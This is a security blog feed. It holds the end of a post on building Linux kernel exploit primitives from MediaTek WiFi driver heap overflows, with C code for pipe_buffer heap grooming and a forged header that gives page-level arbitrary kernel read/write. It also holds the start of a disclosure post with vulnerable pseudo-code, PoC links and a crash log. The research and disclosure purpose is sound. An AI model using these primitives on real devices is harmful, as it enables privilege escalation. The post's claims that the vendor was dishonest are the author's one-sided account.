  <li>Resize every pipe’s buffer array down to 2 entries (<code class="language-plaintext highlighter-rouge">fcntl(fd, F_SETPIPE_SZ, 2 * PAGE_SIZE)</code>),
which causes fresh <code class="language-plaintext highlighter-rouge">kmalloc-128</code> allocations for the resized arrays</li>
  <li>Mark each pipe by writing a unique identifier into it (this also confirms the pipe is functional
and primes the buffer metadata)</li>
  <li>Open holes by closing a subset of pipes, freeing every Nth pipe in a range near the tail of the
spray. The <code class="language-plaintext highlighter-rouge">pipe_buffer</code> arrays that get freed open up holes adjacent to the <code class="language-plaintext highlighter-rouge">pipe_buffer</code> arrays
for the remaining open pipes.</li>
</ol>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* initial spray of pipes */</span>
<span class="n">spray_pipes</span><span class="p">(</span><span class="n">PIPE_SPRAY_CNT</span><span class="p">);</span>

<span class="cm">/* resize pipe_buffer arrays into kmalloc-128 */</span>
<span class="n">pipes_resize_arr</span><span class="p">(</span><span class="n">pipes</span><span class="p">,</span> <span class="n">PIPE_SPRAY_CNT</span><span class="p">,</span> <span class="n">PAGESZ</span> <span class="o">*</span> <span class="n">NUM_PIPEBUF_PER_PIPE</span><span class="p">);</span>

<span class="cm">/* mark each pipe with a unique tag for later identification */</span>
<span class="n">mark_pipes</span><span class="p">(</span><span class="n">PIPE_SPRAY_CNT</span><span class="p">);</span>

<span class="cm">/* open holes in the tail end of the spray */</span>
<span class="n">free_special_pipes</span><span class="p">(</span><span class="n">from</span><span class="p">,</span> <span class="n">to</span><span class="p">);</span>
</code></pre></div></div>

<p>One wrinkle worth flagging: closing a pipe frees <em>both</em> the <code class="language-plaintext highlighter-rouge">pipe_buffer</code> array and the
<code class="language-plaintext highlighter-rouge">pipe_inode_info</code> struct. If both happen to live in the same kmalloc cache (which they would for
<code class="language-plaintext highlighter-rouge">kmalloc-256</code>), the freed <code class="language-plaintext highlighter-rouge">pipe_inode_info</code> goes onto the freelist right alongside the freed
<code class="language-plaintext highlighter-rouge">pipe_buffer</code> array. Since SLUB freelists are LIFO, the <code class="language-plaintext highlighter-rouge">pipe_inode_info</code> (freed second) gets
reallocated <em>first</em>. This means the overflow might land on a <code class="language-plaintext highlighter-rouge">pipe_inode_info</code> instead of a
<code class="language-plaintext highlighter-rouge">pipe_buffer</code> array (corrupting a <code class="language-plaintext highlighter-rouge">struct mutex</code> at the top of the struct and locking the system up
hard).</p>

<h4 id="constructing-the-payload">constructing the payload</h4>

<p>With the <code class="language-plaintext highlighter-rouge">virt_to_page()</code> function described above, we can construct the final payload: a fake
<code class="language-plaintext highlighter-rouge">pipe_buffer</code> header that will replace the first few fields of a legitimate <code class="language-plaintext highlighter-rouge">pipe_buffer</code> in an
adjacent slab slot.</p>

<p>Looking at the struct layout again:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">pipe_buffer</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">page</span><span class="p">;</span>       <span class="c1">// 8 bytes (offset 0)</span>
    <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">offset</span><span class="p">;</span>     <span class="c1">// 4 bytes (offset 8)</span>
    <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span>        <span class="c1">// 4 bytes (offset 12)</span>
    <span class="k">const</span> <span class="k">struct</span> <span class="n">pipe_buf_operations</span> <span class="o">*</span><span class="n">ops</span><span class="p">;</span>  <span class="c1">// 8 bytes (offset 16)</span>
    <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">;</span>      <span class="c1">// 4 bytes (offset 24)</span>
    <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">private</span><span class="p">;</span>   <span class="c1">// 8 bytes (offset 32, after 4 bytes of padding)</span>
<span class="p">};</span>
</code></pre></div></div>

<p>The overflow doesn’t need to cover the entire struct. We only need to overwrite the first three
fields — <code class="language-plaintext highlighter-rouge">page</code>, <code class="language-plaintext highlighter-rouge">offset</code>, and <code class="language-plaintext highlighter-rouge">len</code> — totaling 16 bytes. The remaining fields (<code class="language-plaintext highlighter-rouge">ops</code>, <code class="language-plaintext highlighter-rouge">flags</code>,
<code class="language-plaintext highlighter-rouge">private</code>) stay intact from the original, legitimate <code class="language-plaintext highlighter-rouge">pipe_buffer</code> that was already there before
the overflow. This is convenient since <code class="language-plaintext highlighter-rouge">ops</code> still points to the kernel’s <code class="language-plaintext highlighter-rouge">anon_pipe_buf_ops</code>, so when
the kernel invokes callbacks on the corrupted buffer (e.g., during <code class="language-plaintext highlighter-rouge">pipe_read()</code> or
<code class="language-plaintext highlighter-rouge">pipe_release()</code>), it calls real function pointers and doesn’t immediately crash.</p>
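<p>If you want to double-check the layout without a kernel build handy, a userland mirror of the struct works well enough. This is a sketch that assumes an LP64 target (8-byte pointers and <code class="language-plaintext highlighter-rouge">unsigned long</code>, as on ARM64); the struct and function names are invented for the example.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Userland mirror of the v4.4 struct pipe_buffer, with kernel pointers
 * replaced by fixed-width integers. Assumes an LP64 target like ARM64. */
struct pipe_buffer_mirror {
    uint64_t page;      /* struct page *                      */
    uint32_t offset;
    uint32_t len;
    uint64_t ops;       /* const struct pipe_buf_operations * */
    uint32_t flags;     /* followed by 4 bytes of padding     */
    uint64_t private_;  /* unsigned long                      */
};

/* Number of leading bytes the overflow has to cover: page, offset, len. */
size_t pipe_buffer_header_bytes(void)
{
    size_t n = offsetof(struct pipe_buffer_mirror, ops);
    assert(n == 16);
    return n;
}
```

<p>On a 64-bit build the mirror comes out at 40 bytes, with <code class="language-plaintext highlighter-rouge">ops</code> starting at offset 16, which is exactly where the overflow should stop.</p>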

<p>Here’s how each field is corrupted:</p>

<ul>
  <li><strong><code class="language-plaintext highlighter-rouge">pageptr</code></strong>: the <code class="language-plaintext highlighter-rouge">struct page</code> pointer returned by <code class="language-plaintext highlighter-rouge">virt_to_page(target_addr)</code>. This is the
whole point — it redirects the pipe’s backing page to whatever kernel address we want to
read from or write to.</li>
  <li><strong><code class="language-plaintext highlighter-rouge">offset</code></strong>: the offset within the 4K page where reading/writing should begin. This is typically
calculated as the offset of the target address within its page (<code class="language-plaintext highlighter-rouge">target_addr &amp; 0xfff</code>), plus any
adjustment needed to skip past data we may have written during the marking phase.</li>
  <li><strong><code class="language-plaintext highlighter-rouge">len</code></strong>: controls how many bytes the kernel thinks are available to read from the pipe. Setting
this to a reasonable value like <code class="language-plaintext highlighter-rouge">0x18</code> or <code class="language-plaintext highlighter-rouge">PAGE_SIZE</code> works — the pipe’s <code class="language-plaintext highlighter-rouge">read()</code> path will use
this to determine how much data to copy out.</li>
</ul>

<p>Assembling the payload is then straightforward: fill the overflow buffer up to the boundary of
the adjacent slot, then append the fake header.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// compute the target struct page</span>
<span class="n">fake_pipe</span><span class="p">.</span><span class="n">pageptr</span> <span class="o">=</span> <span class="n">virt_to_page</span><span class="p">(</span><span class="n">target_addr</span><span class="p">);</span>
<span class="n">fake_pipe</span><span class="p">.</span><span class="n">offset</span>  <span class="o">=</span> <span class="p">(</span><span class="n">target_addr</span> <span class="o">&amp;</span> <span class="mh">0xfff</span><span class="p">);</span>
<span class="n">fake_pipe</span><span class="p">.</span><span class="n">len</span>     <span class="o">=</span> <span class="mh">0x18</span><span class="p">;</span>

<span class="c1">// build the payload: [trigger data | padding to boundary | fake pipe_buffer header]</span>
<span class="n">payload</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">payload_size</span><span class="p">);</span>
<span class="n">memset</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="n">payload_size</span><span class="p">);</span>  <span class="cm">/* fill with padding */</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="n">VIE_OPER_CMD</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">VIE_OPER_CMD</span><span class="p">));</span>  <span class="cm">/* ioctl trigger prefix */</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">payload</span> <span class="o">+</span> <span class="n">oob_offset</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">fake_pipe</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">fake_pipe</span><span class="p">));</span>  <span class="cm">/* append fake header */</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">oob_offset</code> is the number of bytes from the start of the payload to the point where the
overflow crosses into the adjacent slab object. Everything before that offset is just filler that
gets written into the vulnerable object’s own allocation. Everything at and after <code class="language-plaintext highlighter-rouge">oob_offset</code> lands
in the neighbor’s memory, which is (hopefully) a <code class="language-plaintext highlighter-rouge">pipe_buffer</code> array we sprayed there.</p>

<h4 id="poc-page-level-arbitrary-read">PoC: page-level arbitrary read</h4>

<p>The full flow for the <code class="language-plaintext highlighter-rouge">vie_oper_proc</code> PoC for this example goes like this:</p>

<ol>
  <li>Initial heap grooming setup described above</li>
  <li>Trigger the <code class="language-plaintext highlighter-rouge">iwpriv mac</code> leak to get a known kernel heap address</li>
  <li>Compute the <code class="language-plaintext highlighter-rouge">struct page</code> pointer for that leaked address</li>
  <li>Build a fake <code class="language-plaintext highlighter-rouge">pipe_buffer</code> header with the computed <code class="language-plaintext highlighter-rouge">page</code> pointer</li>
  <li>Trigger the <code class="language-plaintext highlighter-rouge">vie_oper_proc</code> overflow to overwrite an adjacent <code class="language-plaintext highlighter-rouge">pipe_buffer</code> with the forged
header</li>
  <li>Iterate through the remaining pipes looking for one whose marker value doesn’t match its index (indicating
its <code class="language-plaintext highlighter-rouge">page</code> pointer was redirected and we’re reading from some other location)</li>
  <li>Read from the corrupted pipe; the data comes from the target page if we succeeded</li>
</ol>
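<p>Step 6 is the only part that isn’t obvious from the earlier snippets, so here is a minimal userspace sketch of it. It assumes every sprayed pipe was tagged with its own index as a 4-byte marker before the overflow; <code class="language-plaintext highlighter-rouge">tag_pipe()</code> and <code class="language-plaintext highlighter-rouge">find_redirected_pipe()</code> are hypothetical names for illustration and are not taken from the PoC repo.</p>

```c
#include <stddef.h>
#include <stdint.h>
#include <unistd.h>

/* Hypothetical helper: write the pipe's own index into it as a 4-byte marker. */
static int tag_pipe(int write_fd, uint32_t index)
{
    return write(write_fd, &index, sizeof(index)) == (ssize_t)sizeof(index) ? 0 : -1;
}

/*
 * Hypothetical helper: read the marker back from each pipe and return the
 * index of the first pipe whose marker differs from its own index, or -1 if
 * every marker still matches. A mismatch suggests that pipe is no longer
 * reading from the page it was originally given.
 * Note: this consumes the marker from every pipe it inspects.
 */
static int find_redirected_pipe(int (*pipes)[2], size_t count)
{
    for (size_t i = 0; i < count; i++) {
        uint32_t marker = 0;

        if (read(pipes[i][0], &marker, sizeof(marker)) != (ssize_t)sizeof(marker))
            continue; /* short read or error: skip this pipe */
        if (marker != (uint32_t)i)
            return (int)i;
    }
    return -1;
}
```

<p>Once a mismatching pipe is found, further reads on its read end (and writes on its write end) are the ones that go through the forged <code class="language-plaintext highlighter-rouge">pipe_buffer</code>.</p>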

<p>Here it is in action.</p>

<p><img src="/assets/images/mtk-images/mtk-vie-pipebuf-read.png" alt="mtk-vie-pipebuf-read.png" /></p>

<p>The “Z”s (<code class="language-plaintext highlighter-rouge">0x5a</code>) are the marker bytes written at the address leaked via the <code class="language-plaintext highlighter-rouge">iwpriv mac</code> command.
They’re coming back through the pipe’s <code class="language-plaintext highlighter-rouge">read()</code>, confirming the corrupted <code class="language-plaintext highlighter-rouge">pipe_buffer</code> is
reading from the target page. Page-level arbitrary read, just like that. And by writing into this
corrupted pipe, we get page-level arbitrary write!</p>

<h4 id="practical-caveat-pipe-resize-privilege-requirements">practical caveat: pipe resize privilege requirements</h4>

<p>This is probably the most powerful primitive covered in this post: page-level arbitrary read/write
through a normal pipe fd. However, there’s a practical caveat for cases where the resizing trick is
necessary. <code class="language-plaintext highlighter-rouge">CAP_SYS_RESOURCE</code> is commonly required for pipe capacity changes via <code class="language-plaintext highlighter-rouge">F_SETPIPE_SZ</code>,
which makes the resizing technique most applicable in contexts where the capability is available or
on kernels with permissive <code class="language-plaintext highlighter-rouge">F_SETPIPE_SZ</code> handling.</p>
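<p>One way to find out which case applies on a given target is to just try the resize and look at what comes back. This is a rough sketch rather than code from the PoCs: <code class="language-plaintext highlighter-rouge">try_resize_pipe()</code> is a hypothetical helper, and the fallback constants are the Linux values of the two <code class="language-plaintext highlighter-rouge">fcntl()</code> commands for builds where the libc headers don’t expose them.</p>

```c
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/* Linux-specific fcntl commands; defined here only if the headers hide them. */
#ifndef F_SETPIPE_SZ
#define F_SETPIPE_SZ 1031 /* F_LINUX_SPECIFIC_BASE (1024) + 7 */
#endif
#ifndef F_GETPIPE_SZ
#define F_GETPIPE_SZ 1032 /* F_LINUX_SPECIFIC_BASE (1024) + 8 */
#endif

/*
 * Hypothetical helper: ask the kernel to resize the pipe behind `fd` to
 * `want` bytes. Returns the capacity reported by F_GETPIPE_SZ afterwards,
 * or -errno if the resize was refused (for example -EPERM when the caller
 * lacks the required privilege for that size).
 */
static long try_resize_pipe(int fd, int want)
{
    if (fcntl(fd, F_SETPIPE_SZ, want) < 0)
        return -(long)errno;
    return (long)fcntl(fd, F_GETPIPE_SZ);
}
```

<p>The kernel rounds the requested size, so the returned capacity can be larger than what was asked for. A return of <code class="language-plaintext highlighter-rouge">-EPERM</code> means the resizing trick isn’t available from the current context for that size.</p>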

<h2 id="closing-thoughts">closing thoughts</h2>

<p>Aaaaand, we’re done! I hope at least some of this info will be useful to you in your own exploit dev
adventures, especially if you’re also new to kernel exploitation like I am. As mentioned at the top
of the post, none of the techniques here are novel, so the real goal here is to just compile some of
this info in one place for easier reference. Even though all of these techniques are well-known,
becoming familiar with the prior art can really help you understand the fundamental concepts
being applied and extrapolate them to come up with new techniques that work for your specific target
environment.</p>

<p>To recap, starting from a heap overflow and a heap address leak, we accomplished:</p>

<ul>
  <li><strong>OOB read</strong>: inflated <code class="language-plaintext highlighter-rouge">msg_msg.m_ts</code> for leaking adjacent slab data</li>
  <li><strong>Arbitrary address read + free</strong>: corrupted <code class="language-plaintext highlighter-rouge">msg_msg.next</code> for reading from and freeing a chosen
kernel address</li>
  <li><strong>Code execution</strong>: <code class="language-plaintext highlighter-rouge">seq_operations</code> function pointer corruption for instruction pointer control, plus the
<code class="language-plaintext highlighter-rouge">kfree()</code> trick for inducing use-after-frees</li>
  <li><strong>Page-level R/W</strong>: <code class="language-plaintext highlighter-rouge">pipe_buffer.page</code> corruption for redirecting pipe I/O to arbitrary physical
pages</li>
</ul>

<p>I know this probably isn’t as exciting as a post talking about fully weaponized exploits but I
assure you those are coming. As typically happens, I revisited some of the exploits while
writing this post and came up with some stuff that’s way more fun than
what was initially planned anyway. There should be at least 1-2 posts coming soon, so be on the
lookout.</p>

<p>The PoC code for all of the techniques discussed is available in the linked repository.</p>

<h2 id="references--further-reading">references + further reading</h2>

<h3 id="code">code</h3>

<ul>
  <li><a href="https://github.com/mellow-hype/mtk-kernel-alchemy" target="_blank">PoCs Repo</a></li>
</ul>

<h3 id="writeupspaperstalks">writeups/papers/talks</h3>

<ul>
  <li><a href="https://www.youtube.com/watch?v=2hYzxsWeNcE">SLUB Allocator for Exploit Developers</a> (video)</li>
  <li><a href="https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022">Linux Kernel Heap Feng Shui in 2022</a></li>
  <li><a href="https://devilinside.me/blogs/small-steps-kernel-exploitation">Common kernel objects and their attributes</a></li>
  <li><a href="https://www.interruptlabs.co.uk/articles/pipe-buffer">About pipe_buffer exploitation</a></li>
  <li><a href="https://phrack.org/issues/71/13">PageJack Phrack article</a> / <a href="https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf">PageJack BlackHat paper</a></li>
  <li><a href="https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html#exploring-struct-msg_msg" target="_blank">OOB Write to msg_msg for arb read</a></li>
  <li><a href="https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html" target="_blank">Four Bytes of Power (arb free/leak with msg_msg)</a></li>
  <li><a href="https://terawhiz.github.io/2025/2/oob-write-to-page-uaf-lactf-2025/" target="_blank">OOB Write to Page UaF</a></li>
  <li><a href="https://www.willsroot.io/2022/01/cve-2022-0185.html" target="_blank">msg_msg abuse for OOB read/arbitrary read</a></li>
</ul>

<h3 id="kernel-source-references">kernel source references</h3>

<ul>
  <li><a href="https://elixir.bootlin.com/linux/v4.4.198/source/ipc/msg.c#L765" target="_blank"><code class="language-plaintext highlighter-rouge">do_msg_fill()</code></a></li>
  <li><a href="https://elixir.bootlin.com/linux/v4.4.198/source/ipc/msgutil.c#L156" target="_blank"><code class="language-plaintext highlighter-rouge">store_msg()</code></a></li>
  <li><a href="https://elixir.bootlin.com/linux/v4.4.198/source/ipc/msgutil.c#L174" target="_blank"><code class="language-plaintext highlighter-rouge">free_msg()</code></a></li>
  <li><a href="https://elixir.bootlin.com/linux/v4.4.198/source/include/linux/mm_types.h#L44" target="_blank"><code class="language-plaintext highlighter-rouge">struct page</code></a></li>
</ul>]]></content><author><name>hyper</name></author><category term="0day" /><category term="0days" /><category term="exploits" /><category term="mediatek" /><category term="kernel" /><summary type="html"><![CDATA[Part 1 in a small series of posts covering the development of kernel exploit primitives, demonstrated with a few bugs in the Mediatek MT76xx wifi driver.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/mtk-images/mtk-vie-seqops.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/mtk-images/mtk-vie-seqops.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">mediatek? more like media-REKT, amirite.</title><link href="https://blog.coffinsec.com/0days/2025/12/15/more-like-mediarekt-amirite.html" rel="alternate" type="text/html" title="mediatek? more like media-REKT, amirite." /><published>2025-12-15T00:00:00+00:00</published><updated>2025-12-15T00:00:00+00:00</updated><id>https://blog.coffinsec.com/0days/2025/12/15/more-like-mediarekt-amirite</id><content type="html" xml:base="https://blog.coffinsec.com/0days/2025/12/15/more-like-mediarekt-amirite.html"><![CDATA[<p>It’s been over a year since my last post but I assure you it hasn’t been from a lack of bugs. Here’s a bit of proof! This post provides high-level RCAs and proof-of-concept exploits for 19 vulnerabilities in Mediatek WiFi chipsets that were disclosed this year. I’ll also tell you a little story about my experience dealing with Mediatek during the process of disclosing these bugs to them. I hope you’ll get a nice laugh out of it :)</p>

<h2 id="introduction">introduction</h2>

<p>Hello again! It’s been a while since I’ve posted and it’s been a busy year as usual (including a Pwn2Own win with the boys @SummoningTeam!). This post is going to be a sort of year-in-review for the work I’ve done on Mediatek WiFi chipsets. The bugs discussed below affect the MediaTek MT76xx and MT7915 Wifi chipset family; most of them were found over the course of ~3 months early in the year but were only made public over the past couple of months. A few others were technically discovered last year but were only made public this year. While the 3-month thing might sound impressive, the journey leading up to those three months took 2 years to get through. It’s true what they say, though: once you become familiar enough with a target the bugs just fall right out! Overall, these bugs were a fun introduction to kernel exploitation and being limited to a testbed with basically 0 debugging capabilities was a fun challenge for exploit development.</p>

<p>Along with the bugs, I’m also including a little story I thought might be a kick for those familiar with dealing with vendors and disclosure. An interesting bit of lore: I’d originally planned on releasing the details of these issues via “uncoordinated” disclosure earlier this year, when I wrote the first draft of this post. Better heads ultimately prevailed and I avoided that bag of bees but I hope the story below will give you an idea of <em>why</em> I had considered it.</p>

<p>The reason I chose to include the story at all is because I don’t think companies should be able to hide their shitty behavior behind arbitrary policies they come up with. Coordinated disclosure is an act of good faith and vendors who act in bad faith deserve to be named-and-shamed. Especially when their behavior calls into question their integrity and credibility in assessing the impact of the vulnerabilities in their products. I think the story below will show you exactly what I mean.</p>

<p>I’ll be diving deeper into the discovery and exploitation of a couple of these bugs in future posts, so stick around! But for now, let’s just get on with it.</p>

<p><strong>NOTE: all code snippets included in this post are pseudo-code representative of how the bugs manifest.</strong></p>

<h3 id="the-story-a-glimpse-into-the-madness">the story: a glimpse into the madness</h3>

<p>I’ve intentionally left out <strong>a lot</strong> of context in the interest of brevity and for…reasons. Let’s just say there were <em>incentives</em> for Mediatek to invalidate or downgrade the severity of the bugs I had reported. I’ll just leave it at that. This is the most blatant example but definitely not the only time Mediatek behaved…questionably throughout the process.</p>

<p>At some point during the (nearly 6-month-long) disclosure process for these bugs, the issue was raised about the requirement of root privileges for executing <code class="language-plaintext highlighter-rouge">iwpriv set</code> commands for a particular report. I clarified that the privilege needed was <code class="language-plaintext highlighter-rouge">CAP_NET_ADMIN</code>, but otherwise didn’t argue that point and it was agreed that some privileges were required for a subset of reported issues which were triggered via the <code class="language-plaintext highlighter-rouge">iwpriv set</code> interface. They reduced the impact from High to Medium for one of those issues.</p>

<p>Then a couple of days later, they reduced the impact for almost <em>all</em> of the remaining issues from High to Medium without providing any reason for doing so. When I asked about this for the bugs which <em>weren’t</em> affected by the privilege requirement we’d discussed, they responded by asking me to describe the steps for <em>how I added an unprivileged user</em> and <em>whether root privileges were required to add an unprivileged user</em> for one of the reports they’d reduced the severity of (ignoring all the others I’d asked about). I could barely even understand what that question was supposed to mean given the context. Because I’d used an unprivileged user to execute the PoC in my report, they were asking me whether I would have needed privileges to add that user (implying they think that’s something an attacker would need to do??). So I clarified that I added the steps to add an unprivileged user in my reproduction steps for the benefit of their engineers and <strong>to prove that privileges were not required</strong> to exploit the bug, and that the attacker would <em>be</em> the unprivileged user in an exploit scenario.</p>

<p>And then they hit me with an absolute <strong>banger</strong>: they claimed that, actually, their “default design” doesn’t consider the existence of unprivileged users, and all users are considered to be privileged, therefore <em>privileges are always required</em> and the CVSS is reduced to medium.</p>

<p>For a Linux kernel driver…provided as part of an SDK to OEM vendors…for chipsets supported on embedded and desktop/consumer devices…</p>

<p><img src="/assets/images/big-brain.png" alt="nice" /></p>

<p>I’ll let you sit with that one for a second. It makes even less sense the longer you think about it.</p>

<p>Their exact words (nearly indecipherable within the context of the discussion) were:</p>

<blockquote>
  <p>In our default design, we do not consider multiple user cases. By default, the system only has a privileged user, making the malicious actor more difficult to conduct the attack. This is unlike Android OS apps which can be directly downloaded from Google Play store.</p>
</blockquote>

<p>That’s right. A multi-billion dollar company responsible for producing chipsets that are used across millions of devices says <em>this</em> is how they conceptualize the security of their products. This would be completely disqualifying <em>if they actually meant it</em>.</p>

<p>By this definition of their “default design”, local privilege escalation is <em>impossible</em> for these drivers. Except, <strong>they’ve been issuing CVEs and advisories for these chipsets for years, where they explicitly mention the lack of privileges required and the impact as local privilege escalation</strong>. Like, literally, they’ve issued CVEs for bugs <em>I reported <strong>this year</strong></em>, with this exact language.</p>

<p><img src="/assets/images/mediarekt-disclosure-messaging.png" alt="example 1" /></p>

<p>You can’t make this shit up. Are y’all fucking hearing this??? Interestingly, if you take a look at their most recent advisories, they no longer include <em>any</em> information about the impact. They started doing this after I had pointed out the discrepancy between their supposed “default design” and their classification of past bugs. It gives me the impression that they want to be able to use this bullshit argument in the future with other researchers and they’re trying to cover their bases.</p>

<p>To drive the point home even further (which I don’t think is needed at this point): what would have been the point of raising the issue of the <code class="language-plaintext highlighter-rouge">CAP_NET_ADMIN</code> privilege requirement mentioned at the beginning of the story if no concept of privilege separation even exists in their “default design”?</p>

<p>The answer is that <strong>they were lying</strong>. They were trying to lie to me and they were trying to lie to their customers and partners. They should be embarrassed. Wouldn’t <em>you</em> be embarrassed to say this kind of stuff in public? Frankly, it’s <strong>insulting</strong>. Only someone who doesn’t know shit about how this stuff works would be fooled by these arguments. The alternative is that they actually believe what they’re saying, which doesn’t seem much better.</p>

<p>It begs the question, though: <em>why were they willing to behave in such an obviously dishonest way?</em> I have some thoughts but I’ll leave that up to your imagination, dear reader. I will say this: companies will be as bad as they’re allowed and incentivized to be.</p>

<p>Anyway, after I’d made the decision to <strong>not</strong> go with “uncoordinated” disclosure, I thought I’d remind the folks I was dealing with that I would be under no obligation to not discuss their behavior publicly (as I’m doing now) <em>after</em> the CVEs were made public, along with all the proof needed to show their assessments were faulty. And wouldn’t you know it…that post-nut clarity hit and they dropped (<em>most</em> of) their bullshit arguments.</p>

<p>It’s funny how that works, isn’t it?</p>

<p>In conclusion: <strong><em>fuck it, we ball</em></strong>. Let’s move onto the bugs. These might give you a good laugh, too!</p>

<h2 id="the-bugs">the bugs</h2>

<h3 id="cve-2025-70631-heap-overflow-in-setpsk-ioctl-handler">CVE-2025-20631: Heap Overflow in SETPSK Ioctl Handler</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.0.5.4, v5.1.0.0; MT7629 driver v6.0.3.0</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed), Starlink Wifi Gen2</li>
  <li><strong>Requirements</strong>: <code class="language-plaintext highlighter-rouge">WSC_AP_SUPPORT</code></li>
</ul>

<p>The handler code responsible for handling the <code class="language-plaintext highlighter-rouge">RT_OID_SET_PSK</code> OID is found in the function <code class="language-plaintext highlighter-rouge">RTMPAPSetInformation()</code>. The root cause of the vulnerability is improper bounds checking of the attacker-controlled <code class="language-plaintext highlighter-rouge">iwreq.u.data.length</code> value passed from userspace. An initial check is done on this value to ensure it does not exceed the max of 65 bytes, but failing this check does not immediately trigger an error if the driver is built with the <code class="language-plaintext highlighter-rouge">WSC_AP_SUPPORT</code> feature. In this case, a field <code class="language-plaintext highlighter-rouge">pWscControl</code> from the wireless interface’s device structure is checked; if it’s not NULL, the operation proceeds and ends up calling <code class="language-plaintext highlighter-rouge">copy_from_user()</code> with the attacker-controlled length value to copy into the <code class="language-plaintext highlighter-rouge">pWscControl-&gt;WpaPsk</code> field. This is where the overflow occurs.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="k">if</span> <span class="p">(</span><span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">length</span> <span class="o">&lt;</span> <span class="mi">65</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">pWscControl</span><span class="p">)</span> <span class="p">{</span>
			<span class="c1">// VULNERABLE copy_from_user()</span>
			<span class="n">res</span> <span class="o">=</span> <span class="n">copy_from_user</span><span class="p">(</span><span class="n">wsc_ctrl</span><span class="o">-&gt;</span><span class="n">psk</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">pointer</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">length</span><span class="p">);</span>
			<span class="p">...</span>
		<span class="p">}</span>
	<span class="p">}</span>
</code></pre></div></div>
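<p>For contrast, here is a small userspace model of what a bounded version of that copy could look like. It is only a sketch and not the vendor’s patch: <code class="language-plaintext highlighter-rouge">struct wsc_ctrl_model</code>, <code class="language-plaintext highlighter-rouge">PSK_FIELD_LEN</code> and <code class="language-plaintext highlighter-rouge">set_psk_bounded()</code> are made up for illustration, the field size is an assumption, and <code class="language-plaintext highlighter-rouge">memcpy()</code> stands in for <code class="language-plaintext highlighter-rouge">copy_from_user()</code>.</p>

```c
#include <errno.h>
#include <stddef.h>
#include <string.h>

#define PSK_FIELD_LEN 64 /* assumed destination size, for illustration only */

/* Hypothetical stand-in for the WSC control structure. */
struct wsc_ctrl_model {
    unsigned char psk[PSK_FIELD_LEN];
    unsigned char neighbor[16]; /* whatever happens to follow the field */
};

/*
 * Reject the request before copying whenever the caller-supplied length does
 * not fit the destination, regardless of which branch led here.
 */
static int set_psk_bounded(struct wsc_ctrl_model *ctrl, const void *src, size_t len)
{
    if (ctrl == NULL || src == NULL)
        return -EINVAL;
    if (len > sizeof(ctrl->psk))
        return -EINVAL;
    memcpy(ctrl->psk, src, len); /* models copy_from_user() */
    return 0;
}
```

<p>The point is simply that the length check has to guard the copy itself; a check whose failure path still reaches the copy doesn’t protect anything.</p>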

<h4 id="poc">PoC</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20631.c">PoC Link</a></p>

<p>Execute the PoC on a vulnerable system to corrupt kernel memory.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@WAX206:/tmp# ./poc-ioctl
[  312.422633] Unable to handle kernel paging request at virtual address 41414141414145
[  312.430424] pgd = ffffffc016fb6000
[  312.433854] [41414141414145] *pgd=0000000000000000[  312.434057] [PMF]APPMFInit:: Security is not WPA2/WPA2PSK AES
[  312.434060] [PMF]APPMFInit:: apidx=0, MFPC=0, MFPR=0, SHA256=0
[  312.434126] wifi_sys_linkdown(), wdev idx = 0
...
</code></pre></div></div>

<h3 id="cve-2025-70632-heap-overflow-in-r0khid-ioctl-handler">CVE-2025-20632: Heap Overflow in R0KHID Ioctl Handler</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.0.5.4, v5.1.0.0; MT7629 driver v6.0.3.0</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed), Starlink Wifi Gen2</li>
</ul>

